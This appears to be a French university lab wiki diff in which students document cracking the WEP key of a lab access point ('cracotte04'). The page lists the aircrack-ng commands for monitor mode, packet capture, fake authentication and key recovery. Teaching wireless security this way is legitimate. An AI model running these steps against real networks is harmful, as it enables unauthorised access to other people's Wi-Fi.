TP sysres IMA5sc 2019/2020 G3 : Différence entre versions
Ligne 1 : | Ligne 1 : | ||
− | |||
− | |||
==Mise en place== | ==Mise en place== | ||
==Cassage de clé WEP== | ==Cassage de clé WEP== | ||
+ | |||
+ | On utilise pour casser la clé WEP un dongle wifi "Wi-Pi". | ||
+ | Après avoir connecté le dongle on affiche la liste des interfaces wifi via la commande | ||
+ | $ iwconfig | ||
+ | |||
+ | On observe alors le nom de de l'interface associée au dongle : wlx40a5ef0590b2 renommée lors de la commande en wlan0mon | ||
+ | |||
+ | On commence par passer l'interface en mode moniteur : | ||
+ | $ airmon-ng start wlan0mon | ||
+ | |||
+ | On peut alors visualiser les point d'accès WEP disponibles : | ||
+ | $ airodump-ng --encrypt wep wlan0mon | ||
+ | |||
+ | On choisit de travailler avec cracotte04 dont on va essayer de casser la clé WEP. Grâce à la commande précédente on a pu récupérer son BSSID et son Channel. | ||
+ | On capture les paquets sur l'interface de craquotte04 via la commande : | ||
+ | $ airodump-ng --channel 9 --bssid 04:DA:D2:9C:50:53 -w ./path_to_folder/cracotte04 wlan0mon | ||
+ | |||
+ | On lance alors en simultané sur un autre terminal des simulations de connexions au point d'accès | ||
+ | $ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:53 wlan0mon | ||
+ | |||
+ | Une fois avoir capturé un grand nombre de paquets (au moins 20 000), on peut alors lancer le cassage : | ||
+ | $ aircrack-ng ./path_to_folder/cracotte04.cap |
Version du 25 novembre 2019 à 14:47
Mise en place
Cassage de clé WEP
On utilise pour casser la clé WEP un dongle wifi "Wi-Pi". Après avoir connecté le dongle on affiche la liste des interfaces wifi via la commande
$ iwconfig
On observe alors le nom de de l'interface associée au dongle : wlx40a5ef0590b2 renommée lors de la commande en wlan0mon
On commence par passer l'interface en mode moniteur :
$ airmon-ng start wlan0mon
On peut alors visualiser les point d'accès WEP disponibles :
$ airodump-ng --encrypt wep wlan0mon
On choisit de travailler avec cracotte04 dont on va essayer de casser la clé WEP. Grâce à la commande précédente on a pu récupérer son BSSID et son Channel. On capture les paquets sur l'interface de craquotte04 via la commande :
$ airodump-ng --channel 9 --bssid 04:DA:D2:9C:50:53 -w ./path_to_folder/cracotte04 wlan0mon
On lance alors en simultané sur un autre terminal des simulations de connexions au point d'accès
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:53 wlan0mon
Une fois avoir capturé un grand nombre de paquets (au moins 20 000), on peut alors lancer le cassage :
$ aircrack-ng ./path_to_folder/cracotte04.cap